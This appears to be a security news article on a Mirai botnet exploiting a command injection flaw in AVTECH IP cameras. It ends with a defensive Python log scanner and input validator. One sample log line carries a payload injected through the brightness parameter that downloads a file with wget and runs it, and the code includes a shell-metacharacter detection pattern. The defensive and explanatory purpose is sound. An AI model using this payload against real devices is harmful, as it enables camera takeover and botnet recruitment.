Mirai Botnet Exploits Zero-Day Vulnerability CVE-2024-7029 in AVTECH IP Cameras


Akamai’s Security Intelligence Response Team (SIRT) has discovered a widespread Mirai botnet campaign exploiting a recently disclosed zero-day vulnerability (CVE-2024-7029) in AVTECH IP cameras. The vulnerability, which allows for remote code execution, has been leveraged to propagate a Mirai variant dubbed “Corona,” raising significant concerns about critical infrastructure security.

CVE-2024-7029 is a command injection vulnerability in the “brightness” function of the AVTECH IP cameras’ web interface. A remote attacker who can reach that interface can smuggle shell commands through the brightness argument, and the device executes them with elevated privileges, which amounts to remote code execution. In the campaign Akamai observed, attackers use this foothold to install a variant of the notorious Mirai botnet malware, turning each compromised camera into another scanner for the botnet.

Despite the affected camera models being discontinued, they remain in use across various sectors, including critical infrastructure, highlighting the persistent challenge of managing legacy systems and the potential consequences of unaddressed vulnerabilities. The Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory emphasizing the severity of this vulnerability, citing its ease of exploitation and potential for widespread impact.

The botnet campaign exploiting CVE-2024-7029 is not limited to this single flaw. Akamai researchers have identified that the attackers are also targeting several other vulnerabilities: other weaknesses in AVTECH devices, a Hadoop YARN remote code execution flaw, CVE-2014-8361 (command execution in the Realtek SDK miniigd UPnP SOAP service), and CVE-2017-17215 (remote code execution in Huawei HG532 routers).

The botnet in question is spreading a Mirai variant named “Corona,” whose code carries references to the COVID-19 pandemic and which has been circulating since 2020. Once a device is infected, the variant connects to its command-and-control infrastructure and aggressively scans for and attempts to exploit further vulnerabilities, including those in Huawei devices, to expand the botnet’s reach.

The Akamai SIRT observed the first active botnet campaign on March 18, 2024, with traces of activity dating back to December 2023. Although the proof of concept (PoC) for CVE-2024-7029 has been publicly available since 2019, it wasn’t until August 2024 that it received a formal CVE assignment.

While a patch for CVE-2024-7029 is not yet available, Akamai recommends decommissioning affected devices as the most effective mitigation. Until that is done, organizations should treat these cameras as likely targets: monitor their web-interface logs for command-injection attempts, watch for outbound connections from camera segments to unfamiliar hosts, and keep the devices off the public internet so that the exposed interface cannot be reached by botnet scanners.
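The two technical points above, the injection through the brightness parameter and the advice to monitor for exploitation attempts, can be demonstrated with a small log-scanning routine. The following is an added example written for this page; it is not code from Akamai’s report or from AVTECH firmware. The request path (`/cgi-bin/supervisor/Factory.cgi`), the parameter layout, the valid brightness range (0..100) and the access-log lines are all constructed assumptions chosen to illustrate the pattern, not captured data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in the common "combined" format. They are made up
# for this example and are not captured from a real camera or from Akamai's report.
# Line 1 is a benign brightness change; line 2 carries shell metacharacters in the
# same parameter (URL-encoded, as a scanner would send them); line 3 is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2024:10:14:03 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=50 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Mar/2024:10:14:09 +0000] "GET /cgi-bin/supervisor/Factory.cgi?action=brightness&brightness=%3Bwget%20http%3A%2F%2F192.0.2.10%2Fx%3Bsh%20x HTTP/1.1" 200 512 "-" "-"
198.51.100.23 - - [18/Mar/2024:10:14:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "-"
"""

# Characters that let a value break out of a shell command. None of them belong
# in a numeric camera setting, so their presence is a strong signal by itself.
SHELL_META = re.compile(r"[;|&`$(){}<>\\\n]")

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Percent-decode until the string stops changing, so double-encoded
    payloads (%253B -> %3B -> ;) do not slip past the metacharacter check."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_access_line(line):
    """Split one combined-format log line into source, path, decoded query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)  # one decode pass
    return rec


def suspicious_params(params):
    """Return {name: decoded_value} for every parameter carrying shell metacharacters."""
    hits = {}
    for name, values in params.items():
        for v in values:
            v = fully_decode(v)
            if SHELL_META.search(v):
                hits[name] = v
    return hits


def scan_log(text):
    """Flag requests to any CGI endpoint whose parameters look like command injection."""
    alerts = []
    for line in text.splitlines():
        rec = parse_access_line(line)
        if rec is None or not rec["path"].endswith(".cgi"):
            continue
        hits = suspicious_params(rec["params"])
        if hits:
            alerts.append({"src": rec["src"], "ts": rec["ts"],
                           "path": rec["path"], "params": hits})
    return alerts


def validate_brightness(raw, lo=0, hi=100):
    """The allow-list check a CGI handler should apply before using the value
    anywhere near a shell: digits only, within the assumed range, nothing else.
    Rejecting everything that is not a small integer makes the injection impossible."""
    if not re.fullmatch(r"\d{1,3}", raw):
        raise ValueError(f"brightness must be an integer, got {raw!r}")
    n = int(raw)
    if not lo <= n <= hi:
        raise ValueError(f"brightness {n} outside {lo}..{hi}")
    return n


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['src']} -> {alert['path']} {alert['params']}")
```

`scan_log` raises one alert for the constructed sample, on the request from 198.51.100.23 whose decoded brightness value begins with `;`. `validate_brightness` shows the other side of the same defect: a handler that only ever accepts a bounded integer has nothing for an injected `;` to break out of, which is why input allow-listing, not metacharacter blacklisting, is the correct fix in firmware; the detector is the stopgap for devices that cannot be patched.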
